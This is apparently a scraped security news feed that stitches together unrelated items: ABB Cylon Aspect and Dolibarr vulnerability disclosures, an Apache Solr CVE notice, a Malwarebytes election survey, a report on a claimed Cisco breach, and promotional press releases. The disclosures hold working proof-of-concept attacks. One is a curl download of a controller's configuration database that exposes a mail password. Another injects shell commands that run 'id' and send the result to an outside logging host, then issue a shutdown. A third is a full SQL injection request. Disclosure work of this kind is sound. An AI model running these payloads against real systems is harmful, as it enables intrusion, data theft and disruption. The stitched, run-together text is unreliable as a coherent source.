ABB Cylon Aspect version 3.08.01 suffers from an unauthenticated configuration download vulnerability. This can be exploited to download the SQLite DB that contains the configuration mappings information via the FTControlServlet by directly calling the mapConfigurationDownload.php script.

ABB Cylon Aspect 3.08.01 (mapConfigurationDownload.php) Config DownloadVendor: ABB Ltd.Product web page: https://www.global.abbAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio Firmware: <=3.08.01Summary: ASPECT is an award-winning scalable building energy managementand control solution designed to allow users seamless access to theirbuilding data through standard building protocols including smart devices.Desc: The ABB BMS/BAS controller suffers from an unauthenticated configurationdownload vulnerability. This can be exploited to download the SQLite DB thatcontains the configuration mappings information via the FTControlServlet bydirectly calling the mapConfigurationDownload.php script.Tested on: GNU/Linux 3.15.10 (armv7l) GNU/Linux 3.10.0 (x86_64) GNU/Linux 2.6.32 (x86_64) Intel(R) Atom(TM) Processor E3930 @ 1.30GHz Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz PHP/7.3.11 PHP/5.6.30 PHP/5.4.16 PHP/4.4.8 PHP/5.3.3 AspectFT Automation Application Server lighttpd/1.4.32 lighttpd/1.4.18 Apache/2.2.15 (CentOS) OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscienceAdvisory ID: ZSL-2024-5843Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5843.php21.04.2024--$ cat project P R O J E C T .| | | |'| ._____ ___ | | |. |' .---"| _ .-' '-. | | .--'| || | _| | .-'| _.| | || '-__ | | | || | |' | |. | || | | | | || | ____| '-' ' "" '-' '-.' '` |____░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ $ curl -A thricer http://192.168.73.31/mapConfigurationDownload.php -o juice.db % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed100 3021k 100 3021k 0 0 112k 0 0:00:26 0:00:26 --:--:-- 136k$ strings.exe juice.db | findstr /spina:d "tlsVersions"1878:dcom.aamatrix.topology.services.notification.EmailNotificationServer{"host":"smtp.gmail.com","smtpLocalhost":"google.com","starttls":1,"tlsVersions":"","from":"zsl_alarms@gmail.com","username":"zsl_alarms@gmail.com","password":"t00tw00t","port":587,"logDebugInfo":false,"authMode":0,"enabled":1,"serviceName":"EmailNotificationServer","debugLevel":0,"friendlyName":"Email Notification Service","description":""}

ABB Cylon Aspect 3.08.01 mapConfigurationDownload.php Configuration Download

New ConfigSets that are created via a Restore command, which copy a configSet from the backup and give it a new name, are created without setting the "trusted" metadata.
ConfigSets that do not contain the flag are trusted implicitly if the metadata is missing, therefore this leads to "trusted" ConfigSets that may not have been created with an Authenticated request.
"trusted" ConfigSets are able to load custom code into classloaders, therefore the flag is supposed to only be set when the request that uploads the ConfigSet is Authenticated & Authorized.

This issue affects Apache Solr: from 6.6.0 before 8.11.4, from 9.0.0 before 9.7.0. This issue does not affect Solr instances that are secured via Authentication/Authorization.

Users are primarily recommended to use Authentication and Authorization when running Solr. However, upgrading to version 9.7.0, or 8.11.4 will mitigate this issue otherwise.

New ConfigSets that are created via a Restore command, which copy a configSet from the backup and give it a new name, are created without setting the "trusted" metadata.  
ConfigSets that do not contain the flag are trusted implicitly if the metadata is missing, therefore this leads to "trusted" ConfigSets that may not have been created with an Authenticated request.  
"trusted" ConfigSets are able to load custom code into classloaders, therefore the flag is supposed to only be set when the request that uploads the ConfigSet is Authenticated & Authorized.

This issue affects Apache Solr: from 6.6.0 before 8.11.4, from 9.0.0 before 9.7.0. This issue does not affect Solr instances that are secured via Authentication/Authorization.

Users are primarily recommended to use Authentication and Authorization when running Solr. However, upgrading to version 9.7.0, or 8.11.4 will mitigate this issue otherwise.

**References**

*   https://nvd.nist.gov/vuln/detail/CVE-2024-45217
*   https://solr.apache.org/security.html#cve-2024-45217-apache-solr-configsets-created-during-a-backup-restore-command-are-trusted-implicitly
*   https://issues.apache.org/jira/browse/SOLR-17418

GHSA-h7w9-c5vx-x7j3: Insecure Default Initialization of Resource vulnerability in Apache Solr

ABB Cylon Aspect version 3.08.00 suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the country, state, locality, organization, and hostname HTTP POST parameters called by the sslCertAjax.php script.

ABB Cylon Aspect 3.08.00 (sslCertAjax.php) Remote Code ExecutionVendor: ABB Ltd.Product web page: https://www.global.abbAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio Firmware: <=3.08.00Summary: ASPECT is an award-winning scalable building energy managementand control solution designed to allow users seamless access to theirbuilding data through standard building protocols including smart devices.Desc: The ABB BMS/BAS controller suffers from an authenticated OS commandinjection vulnerability. This can be exploited to inject and execute arbitraryshell commands through the 'country', 'state', 'locality', 'organization', and'hostname' HTTP POST parameters called by the sslCertAjax.php script.Tested on: GNU/Linux 3.15.10 (armv7l) GNU/Linux 3.10.0 (x86_64) GNU/Linux 2.6.32 (x86_64) Intel(R) Atom(TM) Processor E3930 @ 1.30GHz Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz PHP/7.3.11 PHP/5.6.30 PHP/5.4.16 PHP/4.4.8 PHP/5.3.3 AspectFT Automation Application Server lighttpd/1.4.32 lighttpd/1.4.18 Apache/2.2.15 (CentOS) OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscienceAdvisory ID: ZSL-2024-5842Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5842.php21.04.2024--$ cat project P R O J E C T .| | | |'| ._____ ___ | | |. |' .---"| _ .-' '-. | | .--'| || | _| | .-'| _.| | || '-__ | | | || | |' | |. | || | | | | || | ____| '-' ' "" '-' '-.' '` |____░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ $ curl -X POST "http://192.168.73.31/sslCertAjax.php" \> -H "Cookie: PHPSESSID=xxx" \> -d "opType=genCert\> &country=`sleep 1`\> &state=`sleep 2`\> &locality=`sleep 3`\> &organization=`sleep 4`\> &hostname=ZSL$(curl -A `id` remotelog.zeroscience.mk)" ; ./incom -l httplog &<div>Certificate Generation Successful</div>[1] + 50123 done incom$$ cat httplog------ remotelog ------GET / HTTP/1.1User-Agent: uid=33(www-data)Host: remotelog.zeroscience.mkAccept: */*------ remotelog ------$ shutdown -h +17 "Good afternoon, good evening and good night."

ABB Cylon Aspect 3.08.00 sslCertAjax.php Remote Command Execution

Dolibarr version 20.0.1 suffers from a remote SQL injection vulnerability.

## Titles: dolibarr 20.0.1 Multiple security token SQLi## Author: nu11secur1ty## Date: 10/15/2024## Vendor: https://www.dolibarr.org/## Software: https://www.dolibarr.org/downloads.php## Reference: https://portswigger.net/web-security/sql-injection## Description:The `socid` parameter appears to be vulnerable to SQL injection attacks.The attacker can get sensitive information for the MySQL database from thissystem when he attacks it online from inside!He can do this, by using a vulnerable security token to access the webapplication!STATUS: Medium- Vulnerability[+]Exploits:- SQLi Multiple:```POST /dolibarr-20.0.1/htdocs/commande/stats/index.php HTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflate, brAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36Connection: closeCache-Control: max-age=0Cookie:DOLSESSID_0297178cd410ba92966a17032c81774a6acb1ec7=hsq658oejrct1401omd4nf2c5qOrigin: http://pwnedhost.comUpgrade-Insecure-Requests: 1Referer:http://pwnedhost.com/dolibarr-20.0.1/htdocs/commande/stats/index.php?leftmenu=orders_suppliers&mode=supplierContent-Type: application/x-www-form-urlencodedSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129","Chromium";v="129"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 357token=ac1770a37880433e4ca36f69be4a8bf2&mode=supplier&socid=-1nu11secur1ty'%20or%201%3d1%23&typent_id=-1&categ_id=-1&userid=1&object_status_multiselect=1&object_status%5B%5D=0&object_status%5B%5D=1&object_status%5B%5D=2&object_status%5B%5D=3&object_status%5B%5D=4&object_status%5B%5D=5&object_status%5B%5D=6%2C7&object_status%5B%5D=9&year=2024&submit=Refresh```[+]Response:```SQLiHTTP/1.1 200 OKDate: Tue, 15 Oct 2024 10:23:43 GMTServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4X-Powered-By: PHP/8.2.4Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINReferrer-Policy: same-originConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 80974<!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="robots" content="noindex,nofollow"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="author...[SNIP]... mysqli ...[SNIP]... You have an error in your SQL syntax; check the manual thatcorresponds to your MariaDB server version for the right syntax to use near'WHERE c.date_commande BETWEEN '2022-01-01 00:00:00' AND '2022-12-3123:59:59'...' at line 1<b...[SNIP]... mysqli ...[SNIP]... You have an error in your SQL syntax; check the manual thatcorresponds to your MariaDB server version for the right syntax to use near'WHERE c.date_commande BETWEEN '2023-01-01 00:00:00' AND '2023-12-3123:59:59'...' at line 1<b...[SNIP]... mysqli ...[SNIP]... You have an error in your SQL syntax; check the manual thatcorresponds to your MariaDB server version for the right syntax to use near'WHERE c.date_commande BETWEEN '2024-01-01 00:00:00' AND '2024-12-3123:59:59'...' at line 1<b...[SNIP]... mysqli ...[SNIP]... You have an error in your SQL syntax; check the manual thatcorresponds to your MariaDB server version for the right syntax to use near') FROM WHERE c.date_commande BETWEEN '2022-01-01 00:00:00' AND '2022-12-312...' at line 1<b...[SNIP]... mysqli ...[SNIP]... You have an error in your SQL syntax; check the manual thatcorresponds to your MariaDB server version for the right syntax to use near') FROM WHERE c.date_commande BETWEEN '2023-01-01 00:00:00' AND '2023-12-312...' at line 1<b...[SNIP]... mysqli ...[SNIP]... You have an error in your SQL syntax; check the manual thatcorresponds to your MariaDB server version for the right syntax to use near') FROM WHERE c.date_commande BETWEEN '2024-01-01 00:00:00' AND '2024-12-312...' at line 1<b...[SNIP]... mysqli ...[SNIP]... You have an error in your SQL syntax; check the manual thatcorresponds to your MariaDB server version for the right syntax to use near') FROM WHERE c.date_commande BETWEEN '2022-01-01 00:00:00' AND '2022-12-312...' at line 1<b...[SNIP]... mysqli ...[SNIP]... You have an error in your SQL syntax; check the manual thatcorresponds to your MariaDB server version for the right syntax to use near') FROM WHERE c.date_commande BETWEEN '2023-01-01 00:00:00' AND '2023-12-312...' at line 1<b...[SNIP]... mysqli ...[SNIP]... You have an error in your SQL syntax; check the manual thatcorresponds to your MariaDB server version for the right syntax to use near') FROM WHERE c.date_commande BETWEEN '2024-01-01 00:00:00' AND '2024-12-312...' at line 1<b...[SNIP]... mysqli ...[SNIP]... You have an error in your SQL syntax; check the manual thatcorresponds to your MariaDB server version for the right syntax to use near') as total, AVG() as avg FROM WHERE c.entity IN (1) AND c.fk_user_author =1...' at line 1<b```## Reproduce:[href](https://www.patreon.com/posts/dolibarr-20-0-1-114038337)## Demo PoC:[href](https://www.nu11secur1ty.com/2024/10/dolibarr-2001-multiple-security-token.html)## Time spent:05:27:00

Dolibarr 20.0.1 SQL Injection

The US presidential election is stirring fears amongst a third of people who worry that their vote could be exposed to outsiders.

As the United States enters full swing into its next presidential election, people are feeling worried, unsafe, and afraid.

And none of that has to do with who wins.

According to new research from Malwarebytes, people see this election season as a particularly risky time for their online privacy and cybersecurity. Political ads could be hiding online scams, many people feel, and the election, they say, will likely fall victim to some type of “cyber interference.” Amidst this broader turbulence, 32% are “concerned about who could learn \[their\] vote”—be they family, spouses, or cybercriminals.

For this research, Malwarebytes conducted a pulse survey of its newsletter readers between September 5 and 16, 2024, via the Alchemer Survey platform. In total, 1600 people across the globe responded.

Broadly, Malwarebytes found that:

*   74% of people “consider US election season a risky time for personal information.”
*   Despite a tight presidential race, a shocking 3% of people said they **will not vote** because of “privacy or security concerns.”
*   Distrust in political ads is broad—62% said they “disagree” or “strongly disagree” that the information they receive in US election-related ads is trustworthy.
*   The fears around election ads are not just about trustworthiness, but about harm. 52% are “very concerned” or “concerned” about “falling prey to a scam when interacting with political messages.” 
*   57% have responded to these concerns with action, taking several steps to protect their personal information during this election season.

The electoral process is (forgive us) a lot like cybersecurity: It scares people, it’s hopelessly baroque, and, through a lack of participation, it can produce unwanted results.

Here is what Malwarebytes discovered about the intersection of cybersecurity and elections, with additional guidance on how to protect personal information this season.

****Open distrust****

Getting more than 70% of people to agree on anything is remarkable. And yet, 74% of survey participants said that they “consider US election season a risky time for personal information.” Drilling further into the data, 56% said they were “extremely concerned” or “very concerned” about the security of their personal information during this election season.

The reasons could be obvious. Unlike any other season in America, election season might bring the highest volume of advertisements sent directly to people’s homes, phones, and email accounts—and the accuracy and speed at which they come can feel invasive. The network of data brokers that political campaigns rely on to target voters with ads is enormous, as one Washington Post reporter found in 2020, with “3,000 data points on every voter.”

Escaping this data collection regime has proven difficult for most people. Just 9.6% of survey participants said they “have not received any election related ads” this year.

Elsewhere, 60% had received election-related ads through emails, 58% through physical mailers, 55% through text messages, 40% through social media, and 29% through phone calls.

Those ads may be falling on deaf ears, though. When asked whether they trust the information they receive from US election-related ads, just a combined 5% said they “agree” or “strongly agree” with the sentiment.

****A focus on cybercrime****

While people hold a sense of distrust for election-related ads, they also revealed another emotion towards them: Fear.

That’s because the majority of survey participants said they were worried that these ads and other political messages could be hiding dangerous scams underneath. Most people (52%) said they were “very concerned” or “concerned” about “falling prey to a scam when interacting with political messages.” 

It’s a well-founded concern as, once again during this election season, cybercriminals are trying to lure Americans into online scams with messages about updated voter registrations, campaign donations, and more.

Survey participants also showed widespread fear about whether cybercriminals could reveal who they voted for.

Remember that 32% of participants said they were worried that someone “could learn about \[their\] vote.” When asked _who_, specifically, they were worried about, 73% said cybercriminals. A revealing 2% held fears around their votes being exposed to a family member or a spouse.

Finally, though Malwarebytes did not directly tie the concept of “cybercrime” to the election itself, survey participants were asked about “cyber interference.” When rating their own confidence level in whether the election process will be free from cyber interference, a combined 74% said they were “not very confident” or “not confident at all.”

This statistic should not be interpreted to mean that 74% of people believe the election will be “hacked” or that votes will be switched by an adversarial government—a scenario that has never provably occurred in the US. Instead, it may point to how people interpret “cyber interference. It could include, for example, the pilfering of personal data for political advertisements, or the wanton online distribution of political disinformation to sway voters.

****Taking action****

With distrust rampant and anxiety wide, people are refusing to enter this election season without some precautions.

Two thirds of survey participants (66%) have either taken steps or plan to take steps to secure their personal data during this election season. Malwarebytes asked about several cybersecurity and online privacy measures that, particularly when facing off against online scams, could protect people from having their accounts taken over, their identities stolen, or even their personal information exposed for marketing reasons.

Survey participants took on the following measures:

*   77% enabled Two Factor Authentication (2FA) or Multi-Factor Authentication (MFA) across their accounts
*   47% actively use a password manager
*   41% purchased identity theft protection services
*   31% researched the origins of the campaigns they engage with
*   24% locked down their social media profiles
*   12% used a data broker removal service

On the reverse, Malwarebytes found a small but critical number of people who will refuse to vote during this election “due to privacy or security concerns”—a combined 3% “agreed” or “strongly agreed” with this sentiment.

****Staying safe****

There’s good reason this election season for Americans to be concerned about their online privacy and security—but that doesn’t mean that Americans have to spend the next month riddled with anxiety. This month, people can take the following advice to secure their personal information, lock down their sensitive accounts, and, overall, stay safe from malicious scammers and cybercriminals.

*   **Watch out for fake emails and text messages.** Unless you directly reach out, avoid clicking on links or engaging with these political communications. Instead, go directly to the campaign’s website for information or links to donate.  
*   **Be mindful of sharing personal information**. As a general rule, don’t engage in surveys that ask for personal information. You can check what information is already available about you on the dark web with our free Digital Footprint scan or take the first step in removing your personal information from the network of data brokers online with our Personal Data Remover scan.  
*   **Avoid robocalls and phone scams**. Hackers can spoof phone numbers and impersonate official organizations. Be suspicious of unsolicited phone calls. Immediately hang up, don’t share personal information, and report the phone number.

 Election season raises fears for nearly a third of people who worry their vote could be leaked 

Intel Broker claims a major data breach at Cisco, allegedly stealing source codes, confidential documents, and credentials from…

Intel Broker claims a major data breach at Cisco, allegedly stealing source codes, confidential documents, and credentials from global firms like Verizon, AT&T, Microsoft, and more. Data is now for sale on Breach Forums.

Intel Broker, a hacker notorious for high-profile data breaches, is claiming to have breached the technology giant Cisco Systems, Inc. In a post on the cybercrime platform **Breach Forums**, the hacker stated that the breach enabled them to steal a massive amount of sensitive information from Cisco’s systems.

According to the hacker, the alleged data breach took place on October 10, 2024, while the Breach Forum post was published earlier today on October 14, 2024.

Intel Broker’s post (Screenshot: Hackread.com)

****What Was Allegedly Stolen?****

As seen by the Hackread.com research team, Intel Broker has listed a massive amount of data that was allegedly stolen in the breach, including:

*   **Source Code**: Projects from GitHub, GitLab, and SonarQube, critical to Cisco’s development efforts.
*   **Hard-Coded Credentials**: Sensitive information like login details embedded in source code.
*   **Certificates and Keys**: SSL certificates, and public and private keys crucial for secure communications.
*   **Confidential Documents**: Internal documents and information classified as “Cisco Confidential.”
*   **API Tokens and Storage Buckets**: AWS private buckets, Azure storage buckets, and API tokens that could be used to access critical systems.
*   **Other Sensitive Information**: Jira tickets, Docker builds, and Cisco premium products are also listed.

****Impact on Major Corporations****

Intel Broker also shared a list of companies whose production source codes were allegedly taken during the breach. The list includes several high-profile firms, particularly in the telecommunications and financial sectors, such as:

*   **Telecom Companies**: Verizon, AT&T (USA and Mexico), British Telecom, T-Mobile (USA and Poland), Vodafone (Albania and Australia), and Turkcell.
*   **Financial Institutions**: Bank of America, Barclays, and National Australian Bank.
*   **Tech and Health**: Microsoft, Liberty Global, and Dignity Health.

Sample documents shared by the hacker (Screenshot: Hackread.com)

****Data for Sale****

Intel Broker is offering the stolen data for sale in exchange for Monero (XMR), a cryptocurrency known for its privacy features. The hacker indicated that they are open to using a middleman to facilitate the transaction, ensuring **anonymity** for both the buyer and seller. This method is a common practice among cybercriminals to avoid detection and tracking by authorities.

****Unverified but Serious Claims****

At the time of writing, Hackread.com, which first spotted the hacker’s claims, has reached out to Cisco for comment, but no official response has been given. The breach, if confirmed, could have major consequences for Cisco and the affected companies, raising concerns about the extent of the damage and the potential exploitation of the compromised data.

****Intel Broker and Previous Breaches****

Intel Broker is known for high-profile data breaches. **In June 2024**, the hacker claimed to have breached Apple Inc., stealing source code for internal tools. The same hacker boasted about **breaching AMD** (Advanced Micro Devices, Inc.), and stealing employee and product information.

**In May 2024**, Intel Broker hacked Europol, a breach that the agency later confirmed. Some of the hacker’s previous data breaches are listed below:

*   **Tech in Asia**
*   **Space-Eyes**
*   **Home Depot**
*   **Facebook Marketplace**
*   **U.S. contractor Acuity Inc.**
*   **Staffing giant Robert Half**
*   **Los Angeles International Airport**
*   **Alleged breaches of HSBC and Barclays Bank**

Although the hacker’s origins and affiliates are unknown, according to the United States government, IntelBroker is alleged to be the perpetrator behind one of the **T-Mobile data breaches**.

Nevertheless, these claims regarding the Cisco data breach go on to show the cybersecurity risks faced even by large organizations. As more details emerge, the scale of this breach and its potential fallout will be closely watched.

1.  **Akira Ransomware Targets Businesses via Exploited CISCO VPNs**
2.  **Cisco Network Breach as Employee’s Google Account** **was** **Hacked**
3.  **Hackers Claim 10TB Breach at Russian Cybersecurity Firm Dr.Web**
4.  **Hackers leave US flag after targeting Cisco switches in Russia & Iran**
5.  **Ex-worker hacked Cisco AWS Infrastructure; erased virtual machines**

Intel Broker Claims Cisco Breach, Selling Stolen Data from Major Firms

The ABB BMS/BAS controller suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the 'country', 'state', 'locality', 'organization', and 'hostname' HTTP POST parameters called by the sslCertAjax.php script.

ABB Cylon Aspect 3.08.00 (sslCertAjax.php) Remote Code Execution

PRESS RELEASE

New York, United States, Oct. 10, 2024 (GLOBE NEWSWIRE) -- The Certificate Authority (CA) market is the industry dedicated to the issuing, management, and renewal of digital certificates. These digital certificates are used to authenticate the identification of entities such as websites, organizations, or individuals, as well as to secure network interactions with encryption. CAs are trusted third-party organizations that verify entities' identities and provide certificates to establish secure connections, such as SSL/TLS certificates for websites. This market is essential to the overall cybersecurity ecosystem as it maintains the security, integrity, and trustworthiness of digital communications and transactions on the Internet.

Download Free Sample Report PDF @ https://straitsresearch.com/report/certificate-authority-market/request-sample 

Market Dynamics

Focus on Cybersecurity Integration drives the global certificate authority market.

Certificate Authorities (CAs) are expanding their services to include broader cybersecurity solutions such as threat detection and identity management, resulting in more comprehensive security offerings. They collaborate with cybersecurity firms to integrate certificate management with other important security services, giving organizations an integrated and effective protection approach.

*   For instance, on 10 October 2023, DigiCert expanded its capabilities by integrating its certificate management services with Acronis' cybersecurity and data protection solutions.
    

The emergence of Blockchain Technology creates opportunities for the global certificate authority market.

Blockchain technology's decentralized and tamper-proof mechanism improves the security and transparency of digital certificate issuance and maintenance. This significant development has the potential to eliminate fraud, increase trust, and alter the certification authority market by developing more secure and efficient certificate management systems.

*   For instance, in March 2024, Tezos introduced a blockchain-based certificate management system known as Tezos DigiSign.
    

Regional Analysis

North America is the dominating region in the global certificate authority market shareholder and is anticipated to exhibit a CAGR of XX% during the forecast period. North America dominates the certificate authority market due to its modern IT infrastructure, high cybersecurity awareness, stringent regulatory environment, and the presence of major CA providers such as DigiCert and GlobalSign, which offer a wide range of digital certificate solutions. This region has strong adoption rates of digital certificates, particularly in finance, healthcare, and government.

The United States and Canada are the primary contributors to the North American certificate authority market, benefitting from their strong economies and a significant focus on cybersecurity in sectors such as banking, healthcare, e-commerce, and government services.

The Asia-Pacific (APAC) region is the fastest-growing market for certificate authorities, driven by rapid digitalization, cloud adoption, government initiatives, and significant investments in cybersecurity. Governments in China, India, and Japan are implementing policies and regulations to improve secure communication and protect sensitive data, such as China's security law, National Cyber Security Policy, and Japan's Act on the Protection of Personal Information, which is driving demand for certificate authority (CA) solutions.

These countries are major players in the APAC region, with both local and global CA providers such as CNNIC, e-Mudhra, JPRS, and DigiCert catering to a wide range of demands. The region's diverse legal frameworks and cybersecurity practices have an impact on digital certificate adoption.

Europe's certificate authority market is influenced by a wide range of regulatory standards, and a strong focus on data protection, particularly under GDPR. The market includes a mix of local and international CA providers like Entrust and Sectigo, and increasing adoption in industries including banking, telecommunications, and e-commerce. The region is distinguished for its diverse regulatory environment.

The certificate authority market in Latin America is rising and growing, due to increased digital transformation initiatives in a variety of sectors. Rising cybersecurity concerns and regulatory demands are driving the region's adoption of digital certificates.

The Middle East and Africa region is experiencing an increase in the adoption of digital certificates as businesses and governments seek to improve their cybersecurity posture. Rising digital transactions, legal restrictions, and increased data protection awareness drive the market.

To Gather Additional Insights on the Regional Analysis of the Certificate Authority Market @ https://straitsresearch.com/report/certificate-authority-market/request-sample 

Competitive Players

5.  Entrust Datacard Corporation
    

10.  WISeKey International Holding AG
    

Recent Developments

*   On 12 April 2023, Entrust Launched Zero Trust Ready Solutions for Passwordless Authentication, Next-Generation HSM, and Multi-Cloud Key Compliance
    
*   On 9 May 2023, DigiCert announced a partnership with Oracle to make DigiCert ONE, the platform for digital trust, available on Oracle Cloud Infrastructure (OCI).
    
*   On 7 March 2023, GlobalSign announced a technology partnership with essendi it to integrate Essendi's xc certificate lifecycle management (CLM) software with GlobalSign’s certificate platform, Atlas.
    
*   on 10 October 2023, DigiCert expanded its capabilities by integrating its certificate management services with Acronis' cybersecurity and data protection solutions.
    
*   In January 2023, DigiCert launched the DigiCert Trust Lifecycle Manager, a comprehensive digital trust solution designed to unify certificate management and public key infrastructure (PKI) services.
    

Segmentation

2.  By Certificate Validation Type 
    

Get Detailed Market Segmentation @ https://straitsresearch.com/report/certificate-authority-market/segmentation 

About Straits Research Pvt. Ltd.

Straits Research is a market intelligence company providing global business information reports and services. Our exclusive blend of quantitative forecasting and trends analysis provides forward-looking insight for thousands of decision-makers. Straits Research Pvt. Ltd. provides actionable market research data, especially designed and presented for decision making and ROI.

Whether you are looking at business sectors in the next town or crosswise over continents, we understand the significance of being acquainted with the client’s purchase. We overcome our clients’ issues by recognizing and deciphering the target group and generating leads with utmost precision. We seek to collaborate with our clients to deliver a broad spectrum of results through a blend of market and business research approaches.

Certificate Authority Market Size to Surpass $485M by 2033

Security-focused wearable company HyperRing has launched a joint venture with Paul Bulencea, the co-founder of The College of…

Security-focused wearable company HyperRing has launched a joint venture with Paul Bulencea, the co-founder of The College of Extraordinary Experiences (“The College”) to demonstrate the versatility of its smart ring. In a pilot event held at the globally renowned experience design center, delegates had a unique opportunity to experience HyperRing’s capabilities.

Hosted at the Kliczków Castle in Poland from September 15-19, the 2024 edition of The College of Extraordinary Experiences brought together thought leaders from diverse industries and countries around the world to learn about experience design in a hands-on way. The HyperRing team used the platform to demonstrate a pilot run of their wearable smart ring.

More than 100 attendees had an opportunity to explore the features and unique powers of HyperRing and use it to enhance interactions with their environment. Developed especially for the event, a “Hyper Experiences” app paired with the HyperRing allowed attendees to seamlessly access a comprehensive directory of contacts and instantly add connections to their phones with a simple scan. 

The customized rings not only enhanced the sense of connection and belonging among attendees but streamlined the networking process. With the ability to scan and instantly connect, delegates were able to forgo the hassle of manually entering phone numbers and social media handles, allowing for quicker and more efficient interactions.

Other functions the app will enable include an optional geolocation check-in by users to simplify checking their availability to meet, host, and co-work wherever they are in the world. The partner of the JV and co-founder of The College of Extraordinary Experiences, Paul Bulencea, said: 

“The Experience Ring brings people together through curated global connections, supporting lasting relationships that extend beyond the initial encounter. By helping individuals find one another, host each other, and share extraordinary experiences, it creates a platform for spontaneous connections and ongoing discovery, making the world feel closer and more connected.”

